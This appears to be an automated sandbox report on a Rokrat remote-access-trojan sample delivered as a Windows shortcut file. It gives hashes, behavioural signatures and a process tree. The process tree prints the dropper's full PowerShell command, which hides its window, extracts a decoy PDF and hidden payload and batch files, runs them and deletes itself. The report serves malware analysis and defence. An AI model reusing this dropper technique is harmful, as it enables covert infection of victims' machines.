Analysis
-
max time kernel
146s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240221-en -
resource tags
-
submitted
23-02-2024 05:35
General
-
Target
cbc777d1e018832790482e6fd82ab186ac02036c231f10064b14ff1d81832f13.lnk
-
Size
52.0MB
-
MD5
acf4085b2fa977fc1350f0ddc2710502
-
SHA1
7155d89bae9acd67f5d8cdf651b73ee6b54262c3
-
SHA256
cbc777d1e018832790482e6fd82ab186ac02036c231f10064b14ff1d81832f13
-
SHA512
4aa010f680485f0241cbaff77d3a21509e2f73c4fdfe1940aa63f46949fcb39404e4a2c543c465098806b7059fab234de48fe9996ba1edd9c4a9b7b6ca1dbe70
-
SSDEEP
24576:0Zthnqtka+Dj8bI6c94TuDjoZgRXTTYdy830QtO0oIJjW7sFAc1Mh5D2y8:U9OQj85c91wZgjbaJa7d2y8
Malware Config
Signatures
-
Detect Rokrat payload 2 IoCs
-
Rokrat
Rokrat is a remote access trojan written in c++.
-
Blocklisted process makes network request 3 IoCs
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Deletes itself 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 26 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\cbc777d1e018832790482e6fd82ab186ac02036c231f10064b14ff1d81832f13.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$t1 = 'user32.dll';$t = 'using System; using System.Runtime.InteropServices; public class User32 {[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ', SetLastError = true)]public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ')] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); }'; Add-Type -TypeDefinition $t;$proName = 'powershell.exe'; $cmdMainWindowHandle = [User32]::FindWindow([NullString]::Value, $proName);[User32]::ShowWindow($cmdMainWindowHandle, 0);$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x03401DD6} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000162C, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x0007EEC5;$lnkFile.Read($pdfFile, 0, 0x0007EEC5);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x000804F1,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'public.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x001598F3,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005AA;$lnkFile.Read($stringByte, 0, 0x000005AA);$batStrPath = $env:temp+'\'+'temp.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x00159E9D,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'working.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"&& exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$t1 = 'user32.dll';$t = 'using System; using System.Runtime.InteropServices; public class User32 {[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ', SetLastError = true)]public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ')] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); }'; Add-Type -TypeDefinition $t;$proName = 'powershell.exe'; $cmdMainWindowHandle = [User32]::FindWindow([NullString]::Value, $proName);[User32]::ShowWindow($cmdMainWindowHandle, 0);$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x03401DD6} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000162C, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x0007EEC5;$lnkFile.Read($pdfFile, 0, 0x0007EEC5);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x000804F1,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'public.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x001598F3,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005AA;$lnkFile.Read($stringByte, 0, 0x000005AA);$batStrPath = $env:temp+'\'+'temp.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x00159E9D,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'working.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"3⤵
- Deletes itself
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x0u2ytma\x0u2ytma.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES412F.tmp" "c:\Users\Admin\AppData\Local\Temp\x0u2ytma\CSCA95F2CAE703047E68FC3CEFBA5F8F91.TMP"5⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\cbc777d1e018832790482e6fd82ab186ac02036c231f10064b14ff1d81832f13.pdf"4⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140435⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E5EA6250AE34DFC4DB90A82952BF84EC --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=A7AB843BFDBE855471A8EDBD27F886D1 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=A7AB843BFDBE855471A8EDBD27F886D1 --renderer-client-id=2 --mojo-platform-channel-handle=1836 --allow-no-sandbox-job /prefetch:16⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=7B23A081B1B81202C807CAD242A766CC --mojo-platform-channel-handle=2328 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=F822848ED223CF6898BC217AD82DC777 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=F822848ED223CF6898BC217AD82DC777 --renderer-client-id=5 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job /prefetch:16⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=1CBD1B6146137C2419D5959620548974 --mojo-platform-channel-handle=2704 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=897C22184FA8032B38B8342A8ADAD028 --mojo-platform-channel-handle=2840 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\working.bat""4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "$stringPath=$env:temp+'\'+'temp.dat';$stringByte = Get-Content -path $stringPath -encoding byte;$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$scriptBlock = [scriptblock]::Create($string);&$scriptBlock;"5⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\umgehxt5\umgehxt5.cmdline"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7484.tmp" "c:\Users\Admin\AppData\Local\Temp\umgehxt5\CSCD6DA891C8924702AFA7BA311434208E.TMP"7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vrztl03y\vrztl03y.cmdline"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7501.tmp" "c:\Users\Admin\AppData\Local\Temp\vrztl03y\CSC50B8A3D7FABC4385B8D21AF7F27B56.TMP"7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bv5moge1\bv5moge1.cmdline"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES75CC.tmp" "c:\Users\Admin\AppData\Local\Temp\bv5moge1\CSC65610BE1F4E44ABE942DBA3E8F6941B.TMP"7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ojbwfx3m\ojbwfx3m.cmdline"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7678.tmp" "c:\Users\Admin\AppData\Local\Temp\ojbwfx3m\CSCF72838B8CFB64FD191A34DE572A9C13.TMP"7⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD5b30d3becc8731792523d599d949e63f5
SHA119350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e
-
Filesize
56KB
MD5752a1f26b18748311b691c7d8fc20633
SHA1c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5
-
Filesize
64KB
MD58b706faaff500f56f6439f7c545d8906
SHA1e75ad4cf9d2a931d959d5e56c2869ecae50cf617
SHA256d1d751540ca099151f909d16930d6ec5631e8c82b598edca714911eb9ddcbd12
SHA51213cda448d64dcbfae8b3668160d747f2704835414cb36d07626788956cba70edab157da32aab56d018dd88a7d35ea08791696c2454af5fdb32fe9be8c63bdb0e
-
Filesize
2KB
MD525604a2821749d30ca35877a7669dff9
SHA149c624275363c7b6768452db6868f8100aa967be
SHA2567f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5
-
Filesize
19KB
MD55e98b83a2c0d0af055c55fa38a37a722
SHA111dac3577d839abf3d68b67f354660bcea250ce6
SHA2562f314ca431c9c3bcc3d67566d1351525ce7c894d455b2bba91edc6c93c97da4b
SHA51208ec86f8ffc423da70e0ef7a371b38252189692d73eb74caed183c7101179d71acc01732ac9da6f2f61c9106372f878ee0ca43936a2acc4b21e3565addf6c749
-
Filesize
56KB
MD5ad110507c6e3b8ef23c12c4d275cbf40
SHA1708d62063a303d3fd27cbba165b610c839332327
SHA25643fc53bdc423e79397921d7dab256e45f585513e752f7c97892d1b2d59e44659
SHA512d75a8dd55b331fa1df3ef9b4ac735b306b41768229283be93ef081d25c760e22a075c6e3083415989ad522f28eae600a44d7fcaf355d89c6752b2eca8863d463
-
Filesize
1KB
MD5279848f038f68e76569fc5ec27f674d6
SHA1ee4a45d0e6113d5e9dd17bf24df3d4d8449acd80
SHA2567a654bc1239131dc357b97dd554cdfbcc79fa8af0dcb0fea39f7ecbedf5e4834
SHA5124e5333e2920cb06e06712be64831af63bb4f86507017a506e07e3d27767c5edd02d7d8e6e8986ae00a0ba495a12793a2e2b08d381cbeca2da46058fb396dc104
-
Filesize
1KB
MD5c1c9fb1de39cf6b3b04a0f8025880ad4
SHA14a5c07505cf5bb234bac769c961fe8eaba0cc85f
SHA2567ca5dfef1c514ec1d1c311aa91439fdeb487d41b2dda7a34fc683d5c7cdbfa9b
SHA512d6e7e4c4b2dda4310812d3ee16b8abf5c2ff3559f154565fafc558421e27095ad5342a5542eb434a4b2683ff5fcad5d7418c94966298bca4c6d578c7d3e1672d
-
Filesize
1KB
MD5cea4c1691b87b603f632273ce8df5795
SHA1d8dffbc1cab4e5ec5419c0fe9c4c3cb84c30d641
SHA256ed264ac4323f7df9ae79c8a8e75d509cd1c98f86345fda5674c9fa834630fc3b
SHA5127319270a686d58c52d71306e9be6571bcc99a0bd9090e0e9a1e347a28bff95042448008354d3c3f227b43b6c67ed11a45fd14bbc8b46cdaa17c7b262b202f558
-
Filesize
1KB
MD5da554969704741a371248063faefb344
SHA16892b56f17f515b9a4def7692889f0bc6b94493c
SHA256090d0d0a4982f45f9e167640c944e24b48168f84389fe1b4714a92ba494d1970
SHA512138735fccd17bb20c24d8eeb75a8a719628578d628fbf7c4a6f2b2b7f1218d40ac9d828daffa62468f99944e957424fa56ba3595ed180d84ee23d69cb8246001
-
Filesize
1KB
MD56a7320044cdd30a17308cde9ad74fc11
SHA159bc350d97e70cac2cfbdf8f20ea47fe2fd1d527
SHA2560152cab635e1c4d171f42f21dd0263416352b8bddb529fb10d18f39bb310c326
SHA5126d26c0de149d4dcb4e58010da103dbb123e89eef429a7d7aa8c8835a9c28a34224559e51be63351d6531cc99fc08de0b9b61e85fe3996ecaa0429393a506c6b4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD59efb16a878702eb3c629c895b69667c6
SHA160b5c2b177b91c6bfc2d2b7d88033106d04dbe86
SHA256a2b444f410906833e456692fe6ddf8490bc42c9b4688b1124a71ec90f64c41e5
SHA512ba409ada02da692021748b24339c4910da5aaccf1869a719c00c860d7cbabaad7077957558786bb19f791cc2968579d39b77062c4cbfbf640654aaa340b406ce
-
Filesize
507KB
MD54de5eec4a8b227b451b7209d7ec1f0f4
SHA1e5d41b955fcd2b2187d63e17246db392c16612a8
SHA25614e507f2160b415d8aae1bbe4e5fbcf0a10563a72bb53b7d8a9fc339518bc668
SHA512d523736cd2238c49e9b2ca6da284180772959a39bf8524f6c227013630c7dd030f61a40e64722c2540225231985435838ee4c584474b33ede2cfc1c4671c17b1
-
Filesize
3KB
MD5c312a3a260a83fb07325c659c7d03441
SHA1fcfb179ef4f79bb83a9595b2eb6ac3ea74062757
SHA256a6a26a05d17c5a2dd4a520dd811d44b43be4bd3068b3f79b2fb527caa05bfea1
SHA512f2e63130a32574cef077ff928058a0071dc6d3a9e6f8901f478ea0e9b51bfb87544f31835fb7d66dc71bde2a9d18ecc0f5082a61279e24b1e8a87da266dfa8a1
-
Filesize
1KB
MD578480139d86520ba82766c5b3c9a7479
SHA1436e5aa0ef8c97a0b78a4289d19860c1ab8c1f1a
SHA25685438bc7af4c48130c1fd51f8a02eb13b8d57b983411b15fa7f03a302e8e6d8c
SHA512bc5ce718cf3330ab56a131e874785bd86eef4aa19281d3225401f9e33b798dac6cb6e3e58ba2780d9f3a223a7e16e50f1f64a01d03e1b6e78ea56778cfd449d6
-
Filesize
3KB
MD5b8328966e84a7439361e5bddee383f84
SHA15df44c812153558682c71bfcccce7fb40f061d10
SHA2564405749996f90d468bfc282480684d6e8b5e9d34b1de499dd70364c599526f63
SHA512ea66b6be3bc43671668161e8d0b95ac1e4cb76820b5d7c95c6ba599b3e25b07953bc3bcff608d344051aada680ce81e65808e2129ea5583f28d3b47c0b0ee83e
-
Filesize
3KB
MD56f7f0b71f2edb8820ef51b76d7656439
SHA1ada252950e33953a08c46d74a4245aa6fa06ab10
SHA256f9edcc97e98754c07d6fa4ed3f955c2e4a73fc175a42a2d14f1f47be4cd3d718
SHA51248b740a7b03086224a0593fabe6b7374119e88234c56e17500fa5febd9eb99da34ca5a84e5cb0498e501c03752f9e64294a8e0164fd3dd5fc9ee2de1013253db
-
Filesize
311B
MD5a1640eb8f424ebe13b94955f8d0f6843
SHA18551e56c3e19861dbcae87f83b6d0ab225c3793d
SHA2566c0b21b211ba77b42631e1a2a010f858b8664a8bd0149573596a8cdd72e7c399
